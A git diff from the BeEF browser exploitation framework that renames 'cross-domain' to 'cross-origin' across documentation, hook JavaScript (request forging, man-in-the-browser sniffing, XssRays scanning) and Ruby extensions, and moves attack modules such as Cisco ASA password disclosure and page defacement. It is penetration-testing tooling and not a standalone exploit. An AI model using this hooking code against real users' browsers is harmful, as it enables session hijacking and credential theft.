Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
requestid: needed on the callback
-
allowCrossDomain: set cross-domain requests as allowed or blocked
+
allowCrossOrigin: set cross-origin requests as allowed or blocked
forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
Example usage:
@@ -2379,7 +2379,7 @@ even if WebSockets are enabled.
diff --git a/docs/beef.net.local.html b/docs/beef.net.local.html
index 68119c851..2ec8f7303 100644
--- a/docs/beef.net.local.html
+++ b/docs/beef.net.local.html
@@ -440,7 +440,7 @@ sock: new java.net.Socket();
diff --git a/docs/beef.net.portscanner.html b/docs/beef.net.portscanner.html
index 94f85acd2..1bab44639 100644
--- a/docs/beef.net.portscanner.html
+++ b/docs/beef.net.portscanner.html
@@ -495,7 +495,7 @@ homepage: 'http://www.gnucitizen.org'
diff --git a/docs/beef.net.requester.html b/docs/beef.net.requester.html
index 4ae452daf..45f9b0d5c 100644
--- a/docs/beef.net.requester.html
+++ b/docs/beef.net.requester.html
@@ -268,7 +268,7 @@
diff --git a/docs/beef.net.xssrays.html b/docs/beef.net.xssrays.html
index cc2fea860..903174577 100644
--- a/docs/beef.net.xssrays.html
+++ b/docs/beef.net.xssrays.html
@@ -764,7 +764,7 @@ Other aspects of the original code have been simplified and improved.
diff --git a/docs/beef.os.html b/docs/beef.os.html
index 6f9475546..d5e21abfa 100644
--- a/docs/beef.os.html
+++ b/docs/beef.os.html
@@ -4189,7 +4189,7 @@ http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
diff --git a/docs/beef.session.html b/docs/beef.session.html
index 3a4385854..9473c9724 100644
--- a/docs/beef.session.html
+++ b/docs/beef.session.html
@@ -391,7 +391,7 @@
diff --git a/docs/beef.timeout.html b/docs/beef.timeout.html
index b7ae0c267..6e5df1709 100644
--- a/docs/beef.timeout.html
+++ b/docs/beef.timeout.html
@@ -217,7 +217,7 @@ antisnatchor
diff --git a/docs/beef.updater.html b/docs/beef.updater.html
index 64fc14c65..250b66708 100644
--- a/docs/beef.updater.html
+++ b/docs/beef.updater.html
@@ -722,7 +722,7 @@ websocket.js is used instead.
diff --git a/docs/beef.webrtc.html b/docs/beef.webrtc.html
index cf4d4ec70..e73c2004f 100644
--- a/docs/beef.webrtc.html
+++ b/docs/beef.webrtc.html
@@ -3062,7 +3062,7 @@ against the message directly
diff --git a/docs/beef.websocket.html b/docs/beef.websocket.html
index ab49452b1..e8c20e145 100644
--- a/docs/beef.websocket.html
+++ b/docs/beef.websocket.html
@@ -490,7 +490,7 @@ beef.websocket.send('{"handler" : "' + handler + '", "c
diff --git a/docs/browser.js.html b/docs/browser.js.html
index 108973fad..caa1eb340 100644
--- a/docs/browser.js.html
+++ b/docs/browser.js.html
@@ -4680,7 +4680,7 @@ beef.regCmp('beef.browser');
diff --git a/docs/browser_cookie.js.html b/docs/browser_cookie.js.html
index 24007293a..b67ef92c4 100644
--- a/docs/browser_cookie.js.html
+++ b/docs/browser_cookie.js.html
@@ -163,7 +163,7 @@ beef.regCmp('beef.browser.cookie');
diff --git a/docs/browser_popup.js.html b/docs/browser_popup.js.html
index 71dba38c6..0fb747ab0 100644
--- a/docs/browser_popup.js.html
+++ b/docs/browser_popup.js.html
@@ -70,7 +70,7 @@ beef.regCmp('beef.browser.popup');
diff --git a/docs/dom.js.html b/docs/dom.js.html
index 3cddfc32c..1b37f155d 100644
--- a/docs/dom.js.html
+++ b/docs/dom.js.html
@@ -545,7 +545,7 @@ beef.regCmp('beef.dom');
diff --git a/docs/encode_base64.js.html b/docs/encode_base64.js.html
index ae4c28061..8955081a5 100644
--- a/docs/encode_base64.js.html
+++ b/docs/encode_base64.js.html
@@ -214,7 +214,7 @@ beef.regCmp('beef.encode.base64');
diff --git a/docs/encode_json.js.html b/docs/encode_json.js.html
index 1de92eae9..c6071ca6c 100644
--- a/docs/encode_json.js.html
+++ b/docs/encode_json.js.html
@@ -182,7 +182,7 @@ beef.regCmp('beef.encode.json');
diff --git a/docs/geolocation.js.html b/docs/geolocation.js.html
index 2721f17f7..c2f1c8421 100644
--- a/docs/geolocation.js.html
+++ b/docs/geolocation.js.html
@@ -150,7 +150,7 @@ beef.regCmp('beef.geolocation');
diff --git a/docs/global.html b/docs/global.html
index 3f0b12e08..19b4c0257 100644
--- a/docs/global.html
+++ b/docs/global.html
@@ -192,7 +192,7 @@
diff --git a/docs/hardware.js.html b/docs/hardware.js.html
index fd4799f51..5bf5c2692 100644
--- a/docs/hardware.js.html
+++ b/docs/hardware.js.html
@@ -359,7 +359,7 @@ beef.regCmp('beef.hardware');
diff --git a/docs/index.html b/docs/index.html
index 3b5134bd1..24365d5d6 100644
--- a/docs/index.html
+++ b/docs/index.html
@@ -102,7 +102,7 @@ See the file 'doc/COPYING' for copying permission
diff --git a/docs/init.js.html b/docs/init.js.html
index f5cdd5a5a..25c7612f1 100644
--- a/docs/init.js.html
+++ b/docs/init.js.html
@@ -132,7 +132,7 @@ function beef_init() {
diff --git a/docs/lib_platform.js.html b/docs/lib_platform.js.html
index 398b76b51..6d3d423b5 100644
--- a/docs/lib_platform.js.html
+++ b/docs/lib_platform.js.html
@@ -1302,7 +1302,7 @@
diff --git a/docs/logger.js.html b/docs/logger.js.html
index fb675dbe4..62cef8b5a 100644
--- a/docs/logger.js.html
+++ b/docs/logger.js.html
@@ -403,7 +403,7 @@ beef.regCmp('beef.logger');
diff --git a/docs/mitb.js.html b/docs/mitb.js.html
index d9322ce3b..707068c0f 100644
--- a/docs/mitb.js.html
+++ b/docs/mitb.js.html
@@ -66,7 +66,7 @@ beef.mitb = {
if (method == "GET") {
//GET request -> cross-origin
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
- beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
+ beef.mitb.sniff("GET [Ajax CrossOrigin Request]: " + url);
window.open(url);
}else { //GET request -> same-origin
beef.mitb.sniff("GET [Ajax Request]: " + url);
@@ -288,7 +288,7 @@ beef.regCmp('beef.mitb');
diff --git a/docs/net.js.html b/docs/net.js.html
index 72d006b6c..e01730ae6 100644
--- a/docs/net.js.html
+++ b/docs/net.js.html
@@ -102,7 +102,7 @@ beef.net = {
this.status_text = null; // success, timeout, error, ...
this.response_body = null; // "<html>…." if not a cross-origin request
this.port_status = null; // tcp port is open, closed or not http
- this.was_cross_domain = null; // true or false
+ this.was_cross_origin = null; // true or false
this.was_timedout = null; // the user specified timeout was reached
this.duration = null; // how long it took for the request to complete
this.headers = null; // full response headers
@@ -245,11 +245,11 @@ beef.net = {
* @return {Object} this object contains the response details
*/
request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
- //check if same domain or cross domain
- var cross_domain = true;
+ //check if same origin or cross origin
+ var cross_origin = true;
if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
if (document.location.port == "" || document.location.port == null) {
- cross_domain = !(port == "80" || port == "443");
+ cross_origin = !(port == "80" || port == "443");
}
}
@@ -266,12 +266,12 @@ beef.net = {
//define response object
var response = new this.response;
- response.was_cross_domain = cross_domain;
+ response.was_cross_origin = cross_origin;
var start_time = new Date().getTime();
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
- * This will turn POSTs into GETs for remote-domain requests.
+ * This will turn POSTs into GETs for cross origin requests.
*/
if (method == "POST") {
$j.ajaxSetup({
@@ -338,7 +338,7 @@ beef.net = {
/**
* Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
* - requestid: needed on the callback
- * - allowCrossDomain: set cross-domain requests as allowed or blocked
+ * - allowCrossOrigin: set cross-origin requests as allowed or blocked
*
* forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
* Example usage:
@@ -346,20 +346,20 @@ beef.net = {
* true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
* alert(response.response_body)})
*/
- forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+ forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossOrigin, requestid, callback) {
if (domain == "undefined" || path == "undefined") {
beef.debug("[beef.net.forge_request] Error: Malformed request. No host specified.");
return;
}
- // check if same domain or cross domain
- var cross_domain = true;
+ // check if same origin or cross origin
+ var cross_origin = true;
if (document.domain == domain && document.location.protocol == scheme + ':') {
if (document.location.port == "" || document.location.port == null) {
- cross_domain = !(port == "80" || port == "443");
+ cross_origin = !(port == "80" || port == "443");
} else {
- if (document.location.port == port) cross_domain = false;
+ if (document.location.port == port) cross_origin = false;
}
}
@@ -376,23 +376,23 @@ beef.net = {
// define response object
var response = new this.response;
- response.was_cross_domain = cross_domain;
+ response.was_cross_origin = cross_origin;
var start_time = new Date().getTime();
- // if cross-domain requests are not allowed and the request is cross-domain
+ // if cross-origin requests are not allowed and the request is cross-origin
// don't proceed and return
- if (allowCrossDomain == "false" && cross_domain) {
+ if (allowCrossOrigin == "false" && cross_origin) {
beef.debug("[beef.net.forge_request] Error: Cross Domain Request. The request was not sent.");
response.status_code = -1;
- response.status_text = "crossdomain";
- response.port_status = "crossdomain";
+ response.status_text = "crossorigin";
+ response.port_status = "crossorigin";
response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
if (callback != null) callback(response, requestid);
return response;
}
- // if the request was cross-domain from a HTTPS origin to HTTP
+ // if the request was cross-origin from a HTTPS origin to HTTP
// don't proceed and return
if (document.location.protocol == 'https:' && scheme == 'http') {
beef.debug("[beef.net.forge_request] Error: Mixed Active Content. The request was not sent.");
@@ -407,7 +407,7 @@ beef.net = {
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
- * This will turn POSTs into GETs for remote-domain requests.
+ * This will turn POSTs into GETs for cross origin requests.
*/
if (method == "POST") {
$j.ajaxSetup({
@@ -460,10 +460,10 @@ beef.net = {
},
complete: function (xhr, textStatus) {
- // cross-domain request
- if (cross_domain) {
+ // cross-origin request
+ if (cross_origin) {
- response.port_status = "crossdomain";
+ response.port_status = "crossorigin";
if (xhr.status != 0) {
response.status_code = xhr.status;
@@ -474,7 +474,7 @@ beef.net = {
if (textStatus) {
response.status_text = textStatus;
} else {
- response.status_text = "crossdomain";
+ response.status_text = "crossorigin";
}
if (xhr.getAllResponseHeaders()) {
@@ -488,7 +488,7 @@ beef.net = {
}
} else {
- // same-domain request
+ // same-origin request
response.status_code = xhr.status;
response.status_text = textStatus;
response.headers = xhr.getAllResponseHeaders();
@@ -606,7 +606,7 @@ beef.regCmp('beef.net');
diff --git a/docs/net_connection.js.html b/docs/net_connection.js.html
index 4043f4881..90178a77b 100644
--- a/docs/net_connection.js.html
+++ b/docs/net_connection.js.html
@@ -92,7 +92,7 @@ beef.regCmp('beef.net.connection');
diff --git a/docs/net_cors.js.html b/docs/net_cors.js.html
index 6dd96a8b0..e3ff3d309 100644
--- a/docs/net_cors.js.html
+++ b/docs/net_cors.js.html
@@ -125,7 +125,7 @@ beef.regCmp('beef.net.cors');
diff --git a/docs/net_dns.js.html b/docs/net_dns.js.html
index bcef8f36f..b76c49054 100644
--- a/docs/net_dns.js.html
+++ b/docs/net_dns.js.html
@@ -139,7 +139,7 @@ beef.regCmp('beef.net.dns');
diff --git a/docs/net_local.js.html b/docs/net_local.js.html
index 8b31209a9..ebc8cb793 100644
--- a/docs/net_local.js.html
+++ b/docs/net_local.js.html
@@ -129,7 +129,7 @@ beef.regCmp('beef.net.local');
diff --git a/docs/net_portscanner.js.html b/docs/net_portscanner.js.html
index d0d8d6b78..f3a79c055 100644
--- a/docs/net_portscanner.js.html
+++ b/docs/net_portscanner.js.html
@@ -108,7 +108,7 @@ beef.regCmp('beef.net.portscanner');
diff --git a/docs/net_requester.js.html b/docs/net_requester.js.html
index 02c81a3a5..bf1e7fc28 100644
--- a/docs/net_requester.js.html
+++ b/docs/net_requester.js.html
@@ -53,7 +53,7 @@ beef.net.requester = {
request = requests_array[i];
if (request.proto == 'https') var scheme = 'https'; else var scheme = 'http';
beef.debug('[Requester] ' + request.method + ' ' + scheme + '://' + request.host + ':' + request.port + request.uri + ' - Data: ' + request.data);
- beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
+ beef.net.forge_request(scheme, request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossOrigin, request.id,
function(res, requestid) { beef.net.send('/requester', requestid, {
response_data: res.response_body,
response_status_code: res.status_code,
@@ -83,7 +83,7 @@ beef.regCmp('beef.net.requester');
diff --git a/docs/net_xssrays.js.html b/docs/net_xssrays.js.html
index 1ecd3f0a3..3ca54ff5c 100644
--- a/docs/net_xssrays.js.html
+++ b/docs/net_xssrays.js.html
@@ -199,7 +199,7 @@ beef.net.xssrays = {
this.xss({href:url.href, pathname:url.pathname, hostname:url.hostname, port: url.port, protocol: location.protocol,
search:url.search, type: 'url'});//scan each link & param
} else {
- beef.debug('Scan is not Cross-domain. URLS\nurl :' + url.hostname.toString());
+ beef.debug('Scan is not Cross-origin. URLS\nurl :' + url.hostname.toString());
beef.debug('\nlocation :' + location.hostname.toString());
}
}
@@ -279,7 +279,7 @@ beef.net.xssrays = {
continue;
}
if (!this.crossDomain && (this.host(action).toString() != this.host(location.toString()))) {
- beef.debug('Scan is not Cross-domain. FormPost\naction :' + this.host(action).toString());
+ beef.debug('Scan is not Cross-origin. FormPost\naction :' + this.host(action).toString());
beef.debug('location :' + this.host(location));
continue;
}
@@ -541,7 +541,7 @@ beef.regCmp('beef.net.xssrays');
diff --git a/docs/os.js.html b/docs/os.js.html
index 6060793a3..861cfa1ef 100644
--- a/docs/os.js.html
+++ b/docs/os.js.html
@@ -403,7 +403,7 @@ beef.regCmp('beef.net.os');
diff --git a/docs/session.js.html b/docs/session.js.html
index 09aeaa003..aa3a5909b 100644
--- a/docs/session.js.html
+++ b/docs/session.js.html
@@ -116,7 +116,7 @@ beef.regCmp('beef.session');
diff --git a/docs/timeout.js.html b/docs/timeout.js.html
index c61d382db..1121421d4 100644
--- a/docs/timeout.js.html
+++ b/docs/timeout.js.html
@@ -65,7 +65,7 @@ setTimeout(beef_init, 1000);
diff --git a/docs/updater.js.html b/docs/updater.js.html
index 8b8bf79da..bcef99c65 100644
--- a/docs/updater.js.html
+++ b/docs/updater.js.html
@@ -135,7 +135,7 @@ beef.regCmp('beef.updater');
diff --git a/docs/webrtc.js.html b/docs/webrtc.js.html
index dbbd29def..a8c6ec669 100644
--- a/docs/webrtc.js.html
+++ b/docs/webrtc.js.html
@@ -758,7 +758,7 @@ beef.regCmp('beef.webrtc');
diff --git a/docs/websocket.js.html b/docs/websocket.js.html
index 0313b06b6..cd6a570b7 100644
--- a/docs/websocket.js.html
+++ b/docs/websocket.js.html
@@ -142,7 +142,7 @@ beef.regCmp('beef.websocket');
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieDataGrid.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieDataGrid.js
index bdfb55cf1..51a295999 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieDataGrid.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieDataGrid.js
@@ -187,7 +187,7 @@ ZombieDataGrid = function(url, page, base) {
end
if (BeEF::Core::Configuration.instance.get("beef.extension.xssrays.enable"))
context_menu << {
- id: 'zombie_grid_xssrays_hooked_domain',
+ id: 'zombie_grid_xssrays_hooked_origin',
text: 'Launch XssRays on Hooked Domain',
iconCls: 'zombie-tree-ctxMenu-xssrays'
}
@@ -230,7 +230,7 @@ ZombieDataGrid = function(url, page, base) {
jsonData: {'hb_id': escape(hb_id)}
});
break;
- case 'zombie_grid_xssrays_hooked_domain':
+ case 'zombie_grid_xssrays_hooked_origin':
Ext.Ajax.request({
url: '/api/xssrays/scan/' + escape(hb_id) + '?token=' + beefwui.get_rest_token(),
method: 'POST'
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
index f07ff5a3a..31882aa79 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
@@ -106,9 +106,9 @@ ZombieTab_XssRaysTab = function(zombie) {
padding: '10px 5px 0 5px'
},{
xtype:'checkbox',
- id:'cross_domain',
- fieldLabel: 'Cross-domain (check for XSS on cross-domain resources)',
- name: 'cross_domain',
+ id:'cross_origin',
+ fieldLabel: 'Cross-origin (check for XSS on cross-origin resources)',
+ name: 'cross_origin',
checked: true
}],
@@ -120,7 +120,7 @@ ZombieTab_XssRaysTab = function(zombie) {
bar.update_sending('Starting XssRays on ' + zombie.ip + ' ...');
form.submit({
params: {
- cross_domain: document.getElementById('cross_domain').checked
+ cross_origin: document.getElementById('cross_origin').checked
},
success: function() {
bar.update_sent("Scan settings saved for hooked browser [" + zombie.ip + "]. XssRays will be added to victim DOM on next polling.");
diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
index bbdf1e0f8..e40e144f5 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
@@ -79,7 +79,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
end
if (BeEF::Core::Configuration.instance.get("beef.extension.xssrays.enable"))
context_menu << {
- id: 'xssrays_hooked_domain',
+ id: 'xssrays_hooked_origin',
text: 'Launch XssRays on Hooked Domain',
iconCls: 'zombie-tree-ctxMenu-xssrays'
}
@@ -121,7 +121,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
jsonData: {'hb_id': escape(hb_id)}
});
break;
- case 'xssrays_hooked_domain':
+ case 'xssrays_hooked_origin':
Ext.Ajax.request({
url: '/api/xssrays/scan/' + escape(hb_id) + '?token=' + beefwui.get_rest_token(),
method: 'POST'
diff --git a/extensions/proxy/extension.rb b/extensions/proxy/extension.rb
index 2f20ff7de..f9ce522e0 100644
--- a/extensions/proxy/extension.rb
+++ b/extensions/proxy/extension.rb
@@ -10,7 +10,7 @@ module BeEF
@short_name = 'proxy'
@full_name = 'proxy'
- @description = 'The tunneling proxy allows HTTP requests to the hooked domain to be tunneled through the victim browser'
+ @description = 'The tunneling proxy allows HTTP requests to the hooked origin to be tunneled through the victim browser'
end
end
end
diff --git a/extensions/proxy/proxy.rb b/extensions/proxy/proxy.rb
index 52bcedaeb..3da8cadc9 100644
--- a/extensions/proxy/proxy.rb
+++ b/extensions/proxy/proxy.rb
@@ -125,7 +125,7 @@ module BeEF
path: uri_path_and_qs,
request_date: Time.now,
hooked_browser_id: get_tunneling_proxy,
- allow_cross_domain: 'true'
+ allow_cross_origin: 'true'
)
http.save
print_debug(
@@ -133,7 +133,7 @@ module BeEF
"domain[#{http.domain}:#{http.port}], " \
"method[#{http.method}], " \
"path[#{http.path}], " \
- "cross domain[#{http.allow_cross_domain}]"
+ "cross origin[#{http.allow_cross_origin}]"
)
# Wait for the HTTP response to be stored in the db.
diff --git a/extensions/requester/api/hook.rb b/extensions/requester/api/hook.rb
index 374ff1855..5e075097c 100644
--- a/extensions/requester/api/hook.rb
+++ b/extensions/requester/api/hook.rb
@@ -81,7 +81,7 @@ module BeEF
# The Hash will then be converted into JSON, given as input to beef.net.requester.send Javascript API function
# and finally sent to and executed by the hooked browser.
def requester_parse_db_request(http_db_object)
- allow_cross_domain = http_db_object.allow_cross_domain.to_s
+ allow_cross_origin = http_db_object.allow_cross_origin.to_s
verb = http_db_object.method.upcase
proto = http_db_object.proto.downcase
uri = http_db_object.request.split(/\s+/)[1]
@@ -137,7 +137,7 @@ module BeEF
'port' => @port,
'uri' => uri,
'headers' => headers,
- 'allowCrossDomain' => allow_cross_domain
+ 'allowCrossOrigin' => allow_cross_origin
}
# Add POST request data
diff --git a/extensions/requester/rest/requester.rb b/extensions/requester/rest/requester.rb
index 1b37f2d8b..746b8039b 100644
--- a/extensions/requester/rest/requester.rb
+++ b/extensions/requester/rest/requester.rb
@@ -181,7 +181,7 @@ module BeEF
port: host_port,
path: uri,
request_date: Time.now,
- allow_cross_domain: 'true'
+ allow_cross_origin: 'true'
)
print_debug "added new http request for #{zombie.session}"
diff --git a/extensions/xssrays/api/scan.rb b/extensions/xssrays/api/scan.rb
index fa727fbf4..d2a66f1d0 100644
--- a/extensions/xssrays/api/scan.rb
+++ b/extensions/xssrays/api/scan.rb
@@ -31,7 +31,7 @@ module BeEF
# the URI of the XssRays handler where rays should come back if the vulnerability is verified
beefurl = BeEF::Core::Server.instance.url
- cross_domain = xs.cross_domain
+ cross_origin = xs.cross_origin
timeout = xs.clean_timeout
ws = BeEF::Core::Websocket::Websocket.instance
@@ -47,7 +47,7 @@ module BeEF
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file \'doc/COPYING\' for copying permission
//', '')
- add_to_body xs.id, hb.session, beefurl, cross_domain, timeout
+ add_to_body xs.id, hb.session, beefurl, cross_origin, timeout
if config.get('beef.extension.evasion.enable')
evasion = BeEF::Extension::Evasion::Evasion.instance
@@ -58,18 +58,18 @@ module BeEF
# If we use XHR-polling, add the component to the main hook file
else
build_missing_beefjs_components 'beef.net.xssrays'
- add_to_body xs.id, hb.session, beefurl, cross_domain, timeout
+ add_to_body xs.id, hb.session, beefurl, cross_origin, timeout
end
- print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross domain [#{cross_domain}], clean timeout [#{timeout}].")
+ print_debug("[XSSRAYS] Adding XssRays to the DOM. Scan id [#{xs.id}], started at [#{xs.scan_start}], cross origin [#{cross_origin}], clean timeout [#{timeout}].")
end
- def add_to_body(id, session, beefurl, cross_domain, timeout)
+ def add_to_body(id, session, beefurl, cross_origin, timeout)
config = BeEF::Core::Configuration.instance
req = %{
beef.execute(function() {
- beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_domain}, #{timeout});
+ beef.net.xssrays.startScan('#{id}', '#{session}', '#{beefurl}', #{cross_origin}, #{timeout});
});
}
diff --git a/extensions/xssrays/config.yaml b/extensions/xssrays/config.yaml
index 50004205e..e45766cb2 100644
--- a/extensions/xssrays/config.yaml
+++ b/extensions/xssrays/config.yaml
@@ -10,4 +10,4 @@ beef:
name: 'XSSRays'
authors: ["antisnatchor"]
clean_timeout: 3000
- cross_domain: true
+ cross_origin: true
diff --git a/extensions/xssrays/handler.rb b/extensions/xssrays/handler.rb
index 77894d46a..9208b3539 100644
--- a/extensions/xssrays/handler.rb
+++ b/extensions/xssrays/handler.rb
@@ -67,7 +67,7 @@ module BeEF
)
xssrays_detail.save
- print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip}], hooked domain [#{hooked_browser.domain}]")
+ print_info("[XSSRAYS] Scan id [#{xssrays_scan.id}] received ray [ip:#{hooked_browser.ip}], hooked origin [#{hooked_browser.domain}]")
print_debug("[XSSRAYS] Ray info: \n #{request.query_string}")
end
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/command.js b/modules/browser/hooked_origin/ajax_fingerprint/command.js
similarity index 100%
rename from modules/browser/hooked_domain/ajax_fingerprint/command.js
rename to modules/browser/hooked_origin/ajax_fingerprint/command.js
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml b/modules/browser/hooked_origin/ajax_fingerprint/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/ajax_fingerprint/config.yaml
rename to modules/browser/hooked_origin/ajax_fingerprint/config.yaml
diff --git a/modules/browser/hooked_domain/ajax_fingerprint/module.rb b/modules/browser/hooked_origin/ajax_fingerprint/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/ajax_fingerprint/module.rb
rename to modules/browser/hooked_origin/ajax_fingerprint/module.rb
diff --git a/modules/browser/hooked_domain/alert_dialog/command.js b/modules/browser/hooked_origin/alert_dialog/command.js
similarity index 100%
rename from modules/browser/hooked_domain/alert_dialog/command.js
rename to modules/browser/hooked_origin/alert_dialog/command.js
diff --git a/modules/browser/hooked_domain/alert_dialog/config.yaml b/modules/browser/hooked_origin/alert_dialog/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/alert_dialog/config.yaml
rename to modules/browser/hooked_origin/alert_dialog/config.yaml
diff --git a/modules/browser/hooked_domain/alert_dialog/module.rb b/modules/browser/hooked_origin/alert_dialog/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/alert_dialog/module.rb
rename to modules/browser/hooked_origin/alert_dialog/module.rb
diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js b/modules/browser/hooked_origin/apache_tomcat_examples_cookie_disclosure/command.js
similarity index 100%
rename from modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js
rename to modules/browser/hooked_origin/apache_tomcat_examples_cookie_disclosure/command.js
diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml b/modules/browser/hooked_origin/apache_tomcat_examples_cookie_disclosure/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml
rename to modules/browser/hooked_origin/apache_tomcat_examples_cookie_disclosure/config.yaml
diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb b/modules/browser/hooked_origin/apache_tomcat_examples_cookie_disclosure/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb
rename to modules/browser/hooked_origin/apache_tomcat_examples_cookie_disclosure/module.rb
diff --git a/modules/browser/hooked_domain/cisco_asa_password_disclosure/command.js b/modules/browser/hooked_origin/cisco_asa_password_disclosure/command.js
similarity index 100%
rename from modules/browser/hooked_domain/cisco_asa_password_disclosure/command.js
rename to modules/browser/hooked_origin/cisco_asa_password_disclosure/command.js
diff --git a/modules/browser/hooked_domain/cisco_asa_password_disclosure/config.yaml b/modules/browser/hooked_origin/cisco_asa_password_disclosure/config.yaml
similarity index 91%
rename from modules/browser/hooked_domain/cisco_asa_password_disclosure/config.yaml
rename to modules/browser/hooked_origin/cisco_asa_password_disclosure/config.yaml
index 2394c3635..19db21ff3 100644
--- a/modules/browser/hooked_domain/cisco_asa_password_disclosure/config.yaml
+++ b/modules/browser/hooked_origin/cisco_asa_password_disclosure/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: ["Browser", "Hooked Domain"]
name: "Cisco ASA Plaintext Passwords"
- description: "Recover Username, password, and second password (MFA) used for a Cisco ASA WebVPN session. The hooked domain needs to be the domain authenticated against."
+ description: "Recover Username, password, and second password (MFA) used for a Cisco ASA WebVPN session. The hooked origin needs to be the origin authenticated against."
authors: ["catatonicprime"]
target:
working: ["All"]
diff --git a/modules/browser/hooked_domain/cisco_asa_password_disclosure/module.rb b/modules/browser/hooked_origin/cisco_asa_password_disclosure/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/cisco_asa_password_disclosure/module.rb
rename to modules/browser/hooked_origin/cisco_asa_password_disclosure/module.rb
diff --git a/modules/browser/hooked_domain/clear_console/command.js b/modules/browser/hooked_origin/clear_console/command.js
similarity index 100%
rename from modules/browser/hooked_domain/clear_console/command.js
rename to modules/browser/hooked_origin/clear_console/command.js
diff --git a/modules/browser/hooked_domain/clear_console/config.yaml b/modules/browser/hooked_origin/clear_console/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/clear_console/config.yaml
rename to modules/browser/hooked_origin/clear_console/config.yaml
diff --git a/modules/browser/hooked_domain/clear_console/module.rb b/modules/browser/hooked_origin/clear_console/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/clear_console/module.rb
rename to modules/browser/hooked_origin/clear_console/module.rb
diff --git a/modules/browser/hooked_domain/deface_web_page/command.js b/modules/browser/hooked_origin/deface_web_page/command.js
similarity index 100%
rename from modules/browser/hooked_domain/deface_web_page/command.js
rename to modules/browser/hooked_origin/deface_web_page/command.js
diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_origin/deface_web_page/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/deface_web_page/config.yaml
rename to modules/browser/hooked_origin/deface_web_page/config.yaml
diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_origin/deface_web_page/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/deface_web_page/module.rb
rename to modules/browser/hooked_origin/deface_web_page/module.rb
diff --git a/modules/browser/hooked_domain/deface_web_page_component/command.js b/modules/browser/hooked_origin/deface_web_page_component/command.js
similarity index 100%
rename from modules/browser/hooked_domain/deface_web_page_component/command.js
rename to modules/browser/hooked_origin/deface_web_page_component/command.js
diff --git a/modules/browser/hooked_domain/deface_web_page_component/config.yaml b/modules/browser/hooked_origin/deface_web_page_component/config.yaml
similarity index 100%
rename from modules/browser/hooked_domain/deface_web_page_component/config.yaml
rename to modules/browser/hooked_origin/deface_web_page_component/config.yaml
diff --git a/modules/browser/hooked_domain/deface_web_page_component/module.rb b/modules/browser/hooked_origin/deface_web_page_component/module.rb
similarity index 100%
rename from modules/browser/hooked_domain/deface_web_page_component/module.rb
rename to modules/browser/hooked_origin/deface_web_page_component/module.rb
diff --git a/modules/browser/hooked_domain/disable_developer_tools/command.js b/modules/browser/hooked_origin/disable_developer_tools/command.js
similarity index 100%
rename from modules/browser/hooked_domain/disable_developer_tools/command.js
rename to modules/browser/hooked_origin/disable_developer_tools/command.js
